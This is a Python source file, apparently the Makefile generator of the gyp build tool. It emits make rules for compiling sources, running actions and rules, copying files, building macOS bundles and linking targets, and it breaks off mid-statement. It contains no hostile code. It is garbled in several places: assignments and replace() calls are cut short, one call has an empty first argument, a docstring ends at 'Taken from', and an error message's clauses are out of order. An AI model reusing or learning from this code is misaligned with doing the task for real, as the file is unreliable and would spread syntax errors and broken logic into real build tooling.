import hashlib import os import re import gyp from gyp import xcode_emulation from gyp.common import GypError, EnsureDirExists from gyp.generator.make import generator_default_variables,CalculateVariables # The .d checking code below uses these functions: # wildcard, sort, foreach, shell, wordlist # wildcard can handle spaces, the rest can't. # Since I could find no way to make foreach work with spaces in filenames # correctly, the .d files have spaces replaced with another character. The .d # file for # Chromium\ Framework.framework/foo # is for example # out/Release/.deps/out/Release/Chromium?Framework.framework/foo # This is the replacement character. SPACE_REPLACEMENT = '?' # Header of toplevel Makefile. # This should go into the build tree, but it's easier to keep it here for now. _dirname = os.path.dirname(os.path.abspath(__file__)) with open(os.path.join(_dirname, 'Makefile.tmpl'), 'rt') as f: file_content = SHARED_HEADER = file_content.format(SPACE_REPLACEMENT=SPACE_REPLACEMENT) SHARED_HEADER_SUFFIX_RULES_COMMENT1 = ("""\ # Suffix rules, putting all outputs into $(obj). """) SHARED_HEADER_SUFFIX_RULES_COMMENT2 = ("""\ # Try building from generated source, too. """) header = """\ # This file is generated by gyp; do not edit. """ # Maps every compilable file extension to the do_cmd that compiles it. COMPILABLE_EXTENSIONS = { '.c': 'cc', '.cc': 'cxx', '.cpp': 'cxx', '.cxx': 'cxx', '.s': 'cc', '.S': 'cc', '.m': 'objc', '.mm': 'objcxx', } def WriteRootHeaderSuffixRules(writer): extensions = sorted(COMPILABLE_EXTENSIONS.keys(), key=str.lower) writer.write('# Suffix rules, putting all outputs into $(obj).\n') for ext in extensions: writer.write('$(obj).$(TOOLSET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD\n' % ext) writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext]) writer.write('\n# Try building from generated source, too.\n') for ext in extensions: writer.write('$(obj).$(TOOLSET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD\n' % ext) writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext]) writer.write('\n') for ext in extensions: writer.write('$(obj).$(TOOLSET)/%%.o: $(obj)/%%%s FORCE_DO_CMD\n' % ext) writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext]) writer.write('\n') def Compilable(filename): """Return true if the file is compilable (should be in OBJS).""" for res in (filename.endswith(e) for e in COMPILABLE_EXTENSIONS): if res: return True return False # Map from qualified target to path to output. target_outputs = {} # Map from qualified target to any linkable output. A subset # of target_outputs. E.g. when mybinary depends on liba, we want to # include liba in the linker line; when otherbinary depends on # mybinary, we just want to build mybinary first. target_link_deps = {} def Linkable(filename): """Return true if the file is linkable (should be on the link line).""" return filename.endswith('.o') def Target(filename): """Translate a compilable filename to its .o target.""" return os.path.splitext(filename)[0] + '.o' def EscapeShellArgument(s): """ Quotes an argument so that it will be interpreted literally by a POSIX shell. Taken from """ return "'" + s.replace("'", "'\\''") + "'" def EscapeMakeVariableExpansion(s): """Make has its own variable expansion syntax using $. We must escape it for string to be interpreted literally.""" return s.replace('$', '$$') def EscapeCppDefine(s): """Escapes a CPP define so that it will reach the compiler unaltered.""" s = EscapeShellArgument(s) s = EscapeMakeVariableExpansion(s) # '#' characters must be escaped even embedded in a string, else Make will # treat it as the start of a comment. return s.replace('#', r'\#') def QuoteIfNecessary(string): """TODO: Should this ideally be replaced with one or more of the above functions?""" if '"' in string: string = '"' + string.replace('"', '\\"') + '"' return string def StringToMakefileVariable(string): """Convert a string to a value that is acceptable as a make variable name.""" return re.sub('[^a-zA-Z0-9_]', '_', string) def Sourceify(path): """Convert a path to its source directory form.""" if '$(' in path: return path if os.path.isabs(path): return path return Sourceify.srcdir_prefix + path Sourceify.srcdir_prefix = '' def QuoteSpaces(s, quote=r'\ '): return s.replace(' ', quote) # TODO: Avoid code duplication with _ValidateSourcesForMSVSProject in def _ValidateSourcesForOSX(spec, all_sources): """ Makes sure if duplicate basenames are not specified in the source list. Arguments: spec: The target dictionary containing the properties of the target. """ if spec.get('type', None) != 'static_library': return basenames = {} for source in all_sources: name, ext = os.path.splitext(source) is_compiled_file = ext in ['.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S'] if not is_compiled_file: continue basename = os.path.basename(name) # Don't include extension. basenames.setdefault(basename, []).append(source) error = '' for basename, files in basenames.items(): if len(files) > 1: error += ' %s: %s\n' % (basename, ' '.join(files)) if error: print('static library %s%s libtool on OS X will generate warnings for them. has several files with the same basename:\n' % (spec['target_name'], error)) raise GypError('Duplicate basenames in sources section, see list above') # noinspection PyAttributeOutsideInit class MakefileWriter(object): """MakefileWriter packages up the writing of one target-specific Its only real entry point is Write(), and is mostly used for namespacing. """ def __init__(self, generator_flags, flavor): self.generator_flags = generator_flags self.flavor = flavor self.suffix_rules_srcdir = {} self.suffix_rules_objdir1 = {} self.suffix_rules_objdir2 = {} # Generate suffix rules for all compilable extensions. for ext in COMPILABLE_EXTENSIONS.keys(): # Suffix rules for source folder. self.suffix_rules_srcdir.update({ ext: ("""\ $(obj).$(TOOLSET)/$(TARGET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD @$(call do_cmd,%s,1) """ % (ext, COMPILABLE_EXTENSIONS[ext])) }) # Suffix rules for generated source files. self.suffix_rules_objdir1.update({ ext: ("""\ $(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD @$(call do_cmd,%s,1) """ % (ext, COMPILABLE_EXTENSIONS[ext])) }) self.suffix_rules_objdir2.update({ ext: ("""\ $(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj)/%%%s FORCE_DO_CMD @$(call do_cmd,%s,1) """ % (ext, COMPILABLE_EXTENSIONS[ext])) }) def Write(self, qualified_target, base_path, output_filename, spec, configs, part_of_all): """ The main entry point: writes a .mk file for a single target. Arguments: qualified_target: target we're generating base_path: path relative to source root we're building in, used to resolve target-relative paths output_filename: output .mk file name to write spec: gyp info configs: gyp info part_of_all: flag indicating this target is part of 'all' """ EnsureDirExists(output_filename) self.fp = open(output_filename, 'w') self.fp.write(header) self.qualified_target = qualified_target self.path = base_path = spec['target_name'] self.type = spec['type'] self.toolset = spec['toolset'] self.is_mac_bundle = xcode_emulation.IsMacBundle(self.flavor, spec) if self.flavor == 'mac': self.xcode_settings = xcode_emulation.XcodeSettings(spec) else: self.xcode_settings = None deps, link_deps = self.ComputeDeps(spec) # Some of the generation below can add extra output, sources, or # link dependencies. All of the out params of the functions that # follow use names like extra_foo. extra_outputs = [] extra_sources = [] extra_link_deps = [] extra_mac_bundle_resources = [] mac_bundle_deps = [] if self.is_mac_bundle: self.output = self.ComputeMacBundleOutput() self.output_binary = self.ComputeMacBundleBinaryOutput() else: self.output = self.output_binary = self.ComputeOutput(spec) self.is_standalone_static_library = bool( spec.get('standalone_static_library', 0)) self._INSTALLABLE_TARGETS = ('executable', 'loadable_module', 'shared_library') if (self.is_standalone_static_library or self.type in self._INSTALLABLE_TARGETS): self.alias = os.path.basename(self.output) install_path = self._InstallableTargetInstallPath() else: self.alias = self.output install_path = self.output self.WriteLn("TOOLSET := " + self.toolset) self.WriteLn("TARGET := " + # Actions must come first, since they can generate more OBJs for use below. if 'actions' in spec: self.WriteActions(spec['actions'], extra_sources, extra_outputs, extra_mac_bundle_resources, part_of_all) # Rules must be early like actions. if 'rules' in spec: self.WriteRules(spec['rules'], extra_sources, extra_outputs, extra_mac_bundle_resources) if 'copies' in spec: self.WriteCopies(spec['copies'], extra_outputs, part_of_all) # Bundle resources. if self.is_mac_bundle: all_mac_bundle_resources = spec.get('mac_bundle_resources', []) + extra_mac_bundle_resources self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps) self.WriteMacInfoPlist(mac_bundle_deps) self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps) # Sources. all_sources = spec.get('sources', []) + extra_sources if all_sources: if self.flavor == 'mac': # libtool on OS X generates warnings for duplicate basenames in the same # target. _ValidateSourcesForOSX(spec, all_sources) self.WriteSources( configs, deps, all_sources, extra_outputs, extra_link_deps, gyp.xcode_emulation.MacPrefixHeader(self.xcode_settings, lambda p: Sourceify(self.Absolutify(p)), self.Pchify) ) sources = [x for x in all_sources if Compilable(x)] if sources: self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT1) extensions = set([os.path.splitext(s)[1] for s in sources]) for ext in extensions: if ext in self.suffix_rules_srcdir: self.WriteLn(self.suffix_rules_srcdir[ext]) self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT2) for ext in extensions: if ext in self.suffix_rules_objdir1: self.WriteLn(self.suffix_rules_objdir1[ext]) for ext in extensions: if ext in self.suffix_rules_objdir2: self.WriteLn(self.suffix_rules_objdir2[ext]) self.WriteLn('# End of this set of suffix rules') # Add dependency from bundle to bundle binary. if self.is_mac_bundle: mac_bundle_deps.append(self.output_binary) self.WriteTarget(spec, configs, deps, extra_link_deps + link_deps, mac_bundle_deps, extra_outputs, part_of_all) # Update global list of target outputs, used in dependency tracking. target_outputs[qualified_target] = install_path # Update global list of link dependencies. if self.type in ('static_library', 'shared_library'): target_link_deps[qualified_target] = self.output_binary # Currently any versions have the same effect, but in future the behavior # could be different. if self.generator_flags.get('android_ndk_version', None): self.WriteAndroidNdkModuleRule(, all_sources, link_deps) self.fp.close() def WriteSubMake(self, output_filename, makefile_path, targets, build_dir): """Write a "sub-project" Makefile. This is a small, wrapper Makefile that calls the top-level Makefile to build the targets from a single gyp file (i.e. a sub-project). Arguments: output_filename: sub-project Makefile name to write makefile_path: path to the top-level Makefile targets: list of "all" targets for this sub-project build_dir: build output directory, relative to the sub-project """ gyp.common.EnsureDirExists(output_filename) self.fp = open(output_filename, 'w') self.fp.write(header) # For consistency with other builders, put sub-project build output in the # sub-project dir (see test/subdirectory/ self.WriteLn('export builddir_name ?= %s' % os.path.join(os.path.dirname(output_filename), build_dir)) self.WriteLn('.PHONY: all') self.WriteLn('all:') if makefile_path: makefile_path = ' -C ' + makefile_path self.WriteLn('\t$(MAKE)%s %s' % (makefile_path, ' '.join(targets))) self.fp.close() def WriteActions(self, actions, extra_sources, extra_outputs, extra_mac_bundle_resources, part_of_all): """Write Makefile code for any 'actions' from the gyp input. extra_sources: a list that will be filled in with newly generated source files, if any extra_outputs: a list that will be filled in with any outputs of these actions (used to make other pieces dependent on these actions) part_of_all: flag indicating this target is part of 'all' """ env = self.GetSortedXcodeEnv() for action in actions: name = StringToMakefileVariable('%s_%s' % (self.qualified_target, action['action_name'])) self.WriteLn('### Rules for action "%s":' % action['action_name']) inputs = action['inputs'] outputs = action['outputs'] # Build up a list of outputs. # Collect the output dirs we'll need. dirs = set() for out in outputs: d = os.path.split(out)[0] if d: dirs.add(d) if int(action.get('process_outputs_as_sources', False)): extra_sources += outputs if int(action.get('process_outputs_as_mac_bundle_resources', False)): extra_mac_bundle_resources += outputs # Write the actual command. action_commands = action['action'] if self.flavor == 'mac': action_commands = [gyp.xcode_emulation.ExpandEnvVars(command, env) for command in action_commands] command = gyp.common.EncodePOSIXShellList(action_commands) if 'message' in action: self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, action['message'])) else: self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, name)) if len(dirs) > 0: command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command cd_action = 'cd %s; ' % Sourceify(self.path or '.') # command and cd_action get written to a toplevel variable called # cmd_foo. Toplevel variables can't handle things that change per # makefile like $(TARGET), so hardcode the target. command = command.replace('$(TARGET)', cd_action = cd_action.replace('$(TARGET)', # Set LD_LIBRARY_PATH in case the action runs an executable from this # build which links to shared libs from this build. # actions run on the host, so they should in theory only use host # libraries, but until everything is made cross-compile safe, also use # target libraries. # TODO(piman): when everything is cross-compile safe, remove self.WriteLn('cmd_%s = LD_LIBRARY_PATH=$(builddir)/' '$(builddir)/$$LD_LIBRARY_PATH; ' 'export LD_LIBRARY_PATH; ' '%s%s' % (name, cd_action, command)) self.WriteLn() outputs = [self.Absolutify(o) for o in outputs] # The makefile rules are all relative to the top dir, but the gyp actions # are defined relative to their containing dir. This replaces the obj # variable for the action rule with an absolute version so that the output # goes in the right place. # Only write the 'obj' and 'builddir' rules for the "primary" output (:1); # it's superfluous for the "extra outputs", and this avoids accidentally # writing duplicate dummy rules for those outputs. # Same for environment. self.WriteLn("%s: obj := $(abs_obj)" % QuoteSpaces(outputs[0])) self.WriteLn("%s: builddir := $(abs_builddir)" % QuoteSpaces(outputs[0])) self.WriteSortedXcodeEnv(outputs[0], self.GetSortedXcodeEnv()) for i in inputs: assert ' ' not in i, ("Spaces in action input filenames not supported (%s)" % i) for output in outputs: assert ' ' not in output, ("Spaces in action output filenames not supported (%s)" % output) # See the comment in WriteCopies about expanding env vars. outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs] inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs] self.WriteDoCmd(outputs, map(Sourceify, map(self.Absolutify, inputs)), part_of_all=part_of_all, command=name) # Stuff the outputs in a variable so we can refer to them later. outputs_variable = 'action_%s_outputs' % name self.WriteLn('%s := %s' % (outputs_variable, ' '.join(outputs))) extra_outputs.append('$(%s)' % outputs_variable) self.WriteLn() self.WriteLn() def WriteRules(self, rules, extra_sources, extra_outputs, extra_mac_bundle_resources): """Write Makefile code for any 'rules' from the gyp input. extra_sources: a list that will be filled in with newly generated source files, if any extra_outputs: a list that will be filled in with any outputs of these rules (used to make other pieces dependent on these rules) part_of_all: flag indicating this target is part of 'all' """ env = self.GetSortedXcodeEnv() for rule in rules: name = StringToMakefileVariable('%s_%s' % (self.qualified_target, rule['rule_name'])) count = 0 self.WriteLn('### Generated for rule %s:' % name) all_outputs = [] for rule_source in rule.get('rule_sources', []): dirs = set() (rule_source_dirname, rule_source_basename) = os.path.split(rule_source) (rule_source_root, rule_source_ext) = os.path.splitext(rule_source_basename) outputs = [self.ExpandInputRoot(out, rule_source_root, rule_source_dirname) for out in rule['outputs']] for out in outputs: d = os.path.dirname(out) if d: dirs.add(d) if int(rule.get('process_outputs_as_sources', False)): extra_sources += outputs if int(rule.get('process_outputs_as_mac_bundle_resources', False)): extra_mac_bundle_resources += outputs inputs = map(Sourceify, map(self.Absolutify, [rule_source] + rule.get('inputs', []))) actions = ['$(call do_cmd,%s_%d)' % (name, count)] if name == 'resources_grit': # HACK: This is ugly. Grit intentionally doesn't touch the # timestamp of its output file when the file doesn't change, # which is fine in hash-based dependency systems like scons # and forge, but not kosher in the make world. After some # discussion, hacking around it here seems like the least # amount of pain. actions += ['@touch --no-create $@'] # See the comment in WriteCopies about expanding env vars. outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs] inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs] outputs = [self.Absolutify(o) for o in outputs] all_outputs += outputs # Only write the 'obj' and 'builddir' rules for the "primary" output # (:1); it's superfluous for the "extra outputs", and this avoids # accidentally writing duplicate dummy rules for those outputs. self.WriteLn('%s: obj := $(abs_obj)' % outputs[0]) self.WriteLn('%s: builddir := $(abs_builddir)' % outputs[0]) self.WriteMakeRule(outputs, inputs, actions, command="%s_%d" % (name, count)) # Spaces in rule filenames are not supported, but rule variables have # spaces in them (e.g. RULE_INPUT_PATH expands to '$(abspath $<)'). # The spaces within the variables are valid, so remove the variables # before checking. variables_with_spaces = re.compile(r'\$\([^ ]* \$<\)') for output in outputs: output = re.sub(variables_with_spaces, '', output) assert ' ' not in output, ( "Spaces in rule filenames not yet supported (%s)" % output) self.WriteLn('all_deps += %s' % ' '.join(outputs)) action = [self.ExpandInputRoot(ac, rule_source_root, rule_source_dirname) for ac in rule['action']] mkdirs = '' if len(dirs) > 0: mkdirs = 'mkdir -p %s; ' % ' '.join(dirs) cd_action = 'cd %s; ' % Sourceify(self.path or '.') # action, cd_action, and mkdirs get written to a toplevel variable # called cmd_foo. Toplevel variables can't handle things that change # per makefile like $(TARGET), so hardcode the target. if self.flavor == 'mac': action = [gyp.xcode_emulation.ExpandEnvVars(command, env) for command in action] action = gyp.common.EncodePOSIXShellList(action) action = action.replace('$(TARGET)', cd_action = cd_action.replace('$(TARGET)', mkdirs = mkdirs.replace('$(TARGET)', # Set LD_LIBRARY_PATH in case the rule runs an executable from this # build which links to shared libs from this build. # rules run on the host, so they should in theory only use host # libraries, but until everything is made cross-compile safe, also use # target libraries. # TODO(piman): when everything is cross-compile safe, remove self.WriteLn( "cmd_%(name)s_%(count)d = LD_LIBRARY_PATH=" "$(builddir)/$(builddir)/$$LD_LIBRARY_PATH; " "export LD_LIBRARY_PATH; " "%(cd_action)s%(mkdirs)s%(action)s" % { 'action': action, 'cd_action': cd_action, 'count': count, 'mkdirs': mkdirs, 'name': name, }) self.WriteLn( 'quiet_cmd_%(name)s_%(count)d = RULE %(name)s_%(count)d $@' % { 'count': count, 'name': name, }) self.WriteLn() count += 1 outputs_variable = 'rule_%s_outputs' % name self.WriteList(all_outputs, outputs_variable) extra_outputs.append('$(%s)' % outputs_variable) self.WriteLn('### Finished generating for rule: %s' % name) self.WriteLn() self.WriteLn('### Finished generating for all rules') self.WriteLn('') def WriteCopies(self, copies, extra_outputs, part_of_all): """Write Makefile code for any 'copies' from the gyp input. extra_outputs: a list that will be filled in with any outputs of this action (used to make other pieces dependent on this action) part_of_all: flag indicating this target is part of 'all' """ self.WriteLn('### Generated for copy rule.') variable = StringToMakefileVariable(self.qualified_target + '_copies') outputs = [] for copy in copies: for path in copy['files']: # Absolutify() may call normpath, and will strip trailing slashes. path = Sourceify(self.Absolutify(path)) filename = os.path.split(path)[1] output = Sourceify(self.Absolutify(os.path.join(copy['destination'], filename))) # If the output path has variables in it, which happens in practice for # 'copies', writing the environment as target-local doesn't work, # because the variables are already needed for the target name. # Copying the environment variables into global make variables doesn't # work either, because then the .d files will potentially contain spaces # after variable expansion, and .d file handling cannot handle spaces. # As a workaround, manually expand variables at gyp time. Since 'copies' # can't run scripts, there's no need to write the env then. # WriteDoCmd() will escape spaces for .d files. env = self.GetSortedXcodeEnv() output = gyp.xcode_emulation.ExpandEnvVars(output, env) path = gyp.xcode_emulation.ExpandEnvVars(path, env) self.WriteDoCmd([output], [path], 'copy', part_of_all) outputs.append(output) self.WriteLn('%s = %s' % (variable, ' '.join(map(QuoteSpaces, outputs)))) extra_outputs.append('$(%s)' % variable) self.WriteLn() def WriteMacBundleResources(self, resources, bundle_deps): """Writes Makefile code for 'mac_bundle_resources'.""" self.WriteLn('### Generated for mac_bundle_resources') product_dir = generator_default_variables['PRODUCT_DIR'] sources = map(Sourceify, map(self.Absolutify, resources)) bundle_resources = gyp.xcode_emulation.GetMacBundleResources(product_dir, self.xcode_settings, sources) for output, res in bundle_resources: _, ext = os.path.splitext(output) # TODO(refack): actualy figure this out for `copy-bundle-resource` # is_binary = xcode_emulation.IsBinaryOutputFormat(output) if ext != '.xcassets': # Make does not supports '.xcassets' emulation. self.WriteDoCmd([output], [res], 'mac_tool,,,copy-bundle-resource', part_of_all=True) bundle_deps.append(output) def WriteMacInfoPlist(self, bundle_deps): """Write Makefile code for bundle Info.plist files.""" info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist( generator_default_variables['PRODUCT_DIR'], self.xcode_settings, lambda p: Sourceify(self.Absolutify(p))) if not info_plist: return if defines: # Create an intermediate file to store preprocessed results. intermediate_plist = ('$(obj).$(TOOLSET)/$(TARGET)/' + os.path.basename(info_plist)) self.WriteList(defines, intermediate_plist + ': INFOPLIST_DEFINES', '-D', quoter=EscapeCppDefine) self.WriteMakeRule([intermediate_plist], [info_plist], ['$(call do_cmd,infoplist)', # "Convert" the plist so that any weird whitespace changes from the # preprocessor do not affect the XML parser in mac_tool. '@plutil -convert xml1 $@ $@']) info_plist = intermediate_plist # plists can contain envvars and substitute them into the file. self.WriteSortedXcodeEnv(out, self.GetSortedXcodeEnv(additional_settings=extra_env)) self.WriteDoCmd([out], [info_plist], 'mac_tool,,,copy-info-plist', part_of_all=True) bundle_deps.append(out) def WriteSources(self, configs, deps, sources, extra_outputs, extra_link_deps, precompiled_header): """Write Makefile code for any 'sources' from the gyp input. These are source files necessary to build the current target. configs, deps, sources: input from gyp. extra_outputs: a list of extra outputs this action should be dependent on; used to serialize action/rules before compilation extra_link_deps: a list that will be filled in with any outputs of compilation (to be used in link lines) part_of_all: flag indicating this target is part of 'all' """ # Write configuration-specific variables for CFLAGS, etc. for configname in sorted(configs.keys()): config = configs[configname] self.WriteList(config.get('defines'), 'DEFS_%s' % configname, prefix='-D', quoter=EscapeCppDefine) if self.flavor == 'mac': cflags = self.xcode_settings.GetCflags(configname) cflags_c = self.xcode_settings.GetCflagsC(configname) cflags_cc = self.xcode_settings.GetCflagsCC(configname) cflags_objc = self.xcode_settings.GetCflagsObjC(configname) cflags_objcc = self.xcode_settings.GetCflagsObjCC(configname) else: cflags = config.get('cflags') cflags_c = config.get('cflags_c') cflags_cc = config.get('cflags_cc') cflags_objc = None cflags_objcc = None self.WriteLn("# Flags passed to all source files.") self.WriteList(cflags, 'CFLAGS_%s' % configname) self.WriteLn("# Flags passed to only C files.") self.WriteList(cflags_c, 'CFLAGS_C_%s' % configname) self.WriteLn("# Flags passed to only C++ files.") self.WriteList(cflags_cc, 'CFLAGS_CC_%s' % configname) if self.flavor == 'mac': self.WriteLn("# Flags passed to only ObjC files.") self.WriteList(cflags_objc, 'CFLAGS_OBJC_%s' % configname) self.WriteLn("# Flags passed to only ObjC++ files.") self.WriteList(cflags_objcc, 'CFLAGS_OBJCC_%s' % configname) includes = config.get('include_dirs') if includes: includes = [Sourceify(self.Absolutify(include)) for include in includes] self.WriteList(includes, 'INCS_%s' % configname, prefix='-I') compilable = filter(Compilable, sources) objs = [self.Objectify(self.Absolutify(Target(x))) for x in compilable] self.WriteList(objs, 'OBJS') for obj in objs: assert ' ' not in obj, ( "Spaces in object filenames not supported (%s)" % obj) self.WriteLn('# Add to the list of files we specially track ' 'dependencies for.') self.WriteLn('all_deps += $(OBJS)') self.WriteLn() # Make sure our dependencies are built first. if deps: self.WriteMakeRule(['$(OBJS)'], deps, comment='Make sure our dependencies are built before any of us.', order_only=True) # Make sure the actions and rules run first. # If they generate any extra headers etc., the per-.o file dep tracking # will catch the proper rebuilds, so order only is still ok here. if extra_outputs: self.WriteMakeRule(['$(OBJS)'], extra_outputs, comment='Make sure our actions/rules run before any of us.', order_only=True) pchdeps = precompiled_header.GetObjDependencies(compilable, objs) if pchdeps: self.WriteLn('# Dependencies from obj files to their precompiled headers') for source, obj, gch in pchdeps: self.WriteLn('%s: %s' % (obj, gch)) self.WriteLn('# End precompiled header dependencies') if objs: extra_link_deps.append('$(OBJS)') self.WriteLn("""\ # CFLAGS et al overrides must be target-local. # See "Target-specific Variable Values" in the GNU Make manual.""") self.WriteLn("$(OBJS): TOOLSET := $(TOOLSET)") self.WriteLn("$(OBJS): GYP_CFLAGS := " "$(DEFS_$(BUILDTYPE)) " "$(INCS_$(BUILDTYPE)) " "%s " % precompiled_header.GetInclude('c') + "$(CFLAGS_$(BUILDTYPE)) " "$(CFLAGS_C_$(BUILDTYPE))") self.WriteLn("$(OBJS): GYP_CXXFLAGS := " "$(DEFS_$(BUILDTYPE)) " "$(INCS_$(BUILDTYPE)) " "%s " % precompiled_header.GetInclude('cc') + "$(CFLAGS_$(BUILDTYPE)) " "$(CFLAGS_CC_$(BUILDTYPE))") if self.flavor == 'mac': self.WriteLn("$(OBJS): GYP_OBJCFLAGS := " "$(DEFS_$(BUILDTYPE)) " "$(INCS_$(BUILDTYPE)) " "%s " % precompiled_header.GetInclude('m') + "$(CFLAGS_$(BUILDTYPE)) " "$(CFLAGS_C_$(BUILDTYPE)) " "$(CFLAGS_OBJC_$(BUILDTYPE))") self.WriteLn("$(OBJS): GYP_OBJCXXFLAGS := " "$(DEFS_$(BUILDTYPE)) " "$(INCS_$(BUILDTYPE)) " "%s " % precompiled_header.GetInclude('mm') + "$(CFLAGS_$(BUILDTYPE)) " "$(CFLAGS_CC_$(BUILDTYPE)) " "$(CFLAGS_OBJCC_$(BUILDTYPE))") self.WritePchTargets(precompiled_header.GetPchBuildCommands()) # If there are any object files in our input file list, link them into our # output. extra_link_deps += [source for source in sources if Linkable(source)] self.WriteLn() def WritePchTargets(self, pch_commands): """Writes make rules to compile prefix headers.""" if not pch_commands: return for gch, lang_flag, lang, inpt in pch_commands: extra_flags = { 'c': '$(CFLAGS_C_$(BUILDTYPE))', 'cc': '$(CFLAGS_CC_$(BUILDTYPE))', 'm': '$(CFLAGS_C_$(BUILDTYPE)) $(CFLAGS_OBJC_$(BUILDTYPE))', 'mm': '$(CFLAGS_CC_$(BUILDTYPE)) $(CFLAGS_OBJCC_$(BUILDTYPE))', }[lang] var_name = { 'c': 'GYP_PCH_CFLAGS', 'cc': 'GYP_PCH_CXXFLAGS', 'm': 'GYP_PCH_OBJCFLAGS', 'mm': 'GYP_PCH_OBJCXXFLAGS', }[lang] self.WriteLn("%s: %s := %s " % (gch, var_name, lang_flag) + "$(DEFS_$(BUILDTYPE)) " "$(INCS_$(BUILDTYPE)) " "$(CFLAGS_$(BUILDTYPE)) " + extra_flags) self.WriteLn('%s: %s FORCE_DO_CMD' % (gch, inpt)) self.WriteLn('\t@$(call do_cmd,pch_%s,1)' % lang) self.WriteLn('') assert ' ' not in gch, ( "Spaces in gch filenames not supported (%s)" % gch) self.WriteLn('all_deps += %s' % gch) self.WriteLn('') def ComputeOutputBasename(self, spec): """Return the 'output basename' of a gyp spec. E.g., the loadable module 'foobar' in directory 'baz' will produce '' """ assert not self.is_mac_bundle if self.flavor == 'mac' and self.type in ( 'static_library', 'executable', 'shared_library', 'loadable_module'): return self.xcode_settings.GetExecutablePath() target = spec['target_name'] target_prefix = '' target_ext = '' if self.type == 'static_library': if target[:3] == 'lib': target = target[3:] target_prefix = 'lib' target_ext = '.a' elif self.type in ('loadable_module', 'shared_library'): if target[:3] == 'lib': target = target[3:] target_prefix = 'lib' if self.flavor == 'aix': target_ext = '.a' else: target_ext = '.so' elif self.type == 'none': target = '%s.stamp' % target elif self.type != 'executable': print(("ERROR: What output file should be generated?", "type", self.type, "target", target)) target_prefix = spec.get('product_prefix', target_prefix) target = spec.get('product_name', target) product_ext = spec.get('product_extension') if product_ext: target_ext = '.' + product_ext return target_prefix + target + target_ext def _InstallImmediately(self): return self.toolset == 'target' and self.flavor == 'mac' and self.type in ('static_library', 'executable', 'shared_library', 'loadable_module') def ComputeOutput(self, spec): """Return the 'output' (full output path) of a gyp spec. E.g., the loadable module 'foobar' in directory 'baz' will produce '$(obj)/baz/' """ assert not self.is_mac_bundle path = os.path.join('$(obj).' + self.toolset, self.path) if self.type == 'executable' or self._InstallImmediately(): path = '$(builddir)' path = spec.get('product_dir', path) return os.path.join(path, self.ComputeOutputBasename(spec)) def ComputeMacBundleOutput(self): """Return the 'output' (full output path) to a bundle output directory.""" assert self.is_mac_bundle path = generator_default_variables['PRODUCT_DIR'] return os.path.join(path, self.xcode_settings.GetWrapperName()) def ComputeMacBundleBinaryOutput(self): """Return the 'output' (full output path) to the binary in a bundle.""" path = generator_default_variables['PRODUCT_DIR'] return os.path.join(path, self.xcode_settings.GetExecutablePath()) @staticmethod def ComputeDeps(spec): """Compute the dependencies of a gyp spec. Returns a tuple (deps, link_deps), where each is a list of filenames that will need to be put in front of make for either building (deps) or linking (link_deps). """ deps = [] link_deps = [] if 'dependencies' in spec: deps.extend([target_outputs[dep] for dep in spec['dependencies'] if target_outputs[dep]]) for dep in spec['dependencies']: if dep in target_link_deps: link_deps.append(target_link_deps[dep]) deps.extend(link_deps) # TODO: It seems we need to transitively link in libraries (e.g. -lfoo)? # This hack makes it work: # link_deps.extend(spec.get('libraries', [])) return gyp.common.uniquer(deps), gyp.common.uniquer(link_deps) def WriteDependencyOnExtraOutputs(self, extra_outputs): self.WriteMakeRule([self.output_binary], extra_outputs, comment='Build our special outputs first.', order_only=True) def WriteTarget(self, spec, configs, deps, link_deps, bundle_deps, extra_outputs, part_of_all): """ Write Makefile code to produce the final target of the gyp spec. spec: input from gyp. configs: input from gyp. deps: dependency lists; see ComputeDeps() link_deps: dependency lists; see ComputeDeps() extra_outputs: any extra outputs that our target should depend on part_of_all: flag indicating this target is part of 'all' """ self.WriteLn('### Rules for final target.') if extra_outputs: self.WriteDependencyOnExtraOutputs(extra_outputs) self.WriteMakeRule(extra_outputs, deps, comment='Preserve order dependency of special output on deps.', order_only=True) target_postbuilds = {} if self.type != 'none': for configname in sorted(configs.keys()): config = configs[configname] if self.flavor == 'mac': ldflags = self.xcode_settings.GetLdflags(configname, generator_default_variables['PRODUCT_DIR'], lambda p: Sourceify(self.Absolutify(p))) # TARGET_POSTBUILDS_$(BUILDTYPE) is added to postbuilds later on. gyp_to_build = gyp.common.InvertRelativePath(self.path) target_postbuild = self.xcode_settings.AddImplicitPostbuilds( configname, QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output))), QuoteSpaces(os.path.normpath(os.path.join(gyp_to_build, self.output_binary)))) if target_postbuild: target_postbuilds[configname] = target_postbuild else: ldflags = config.get('ldflags', []) # Compute an rpath for this output if needed. if any(dep.endswith('.so') or '.so.' in dep for dep in deps): # We want to get the literal string "$ORIGIN" into the link command, # so we need lots of escaping. ldflags.append(r'-Wl,-rpath=\$$ORIGIN/lib.%s/' % self.toolset) ldflags.append(r'-Wl,-rpath-link=\$(builddir)/lib.%s/' % self.toolset) library_dirs = config.get('library_dirs', []) ldflags += [('-L%s' % library_dir) for library_dir in library_dirs] self.WriteList(ldflags, 'LDFLAGS_%s' % configname) if self.flavor == 'mac': self.WriteList(self.xcode_settings.GetLibtoolflags(configname), 'LIBTOOLFLAGS_%s' % configname) libraries = spec.get('libraries') if 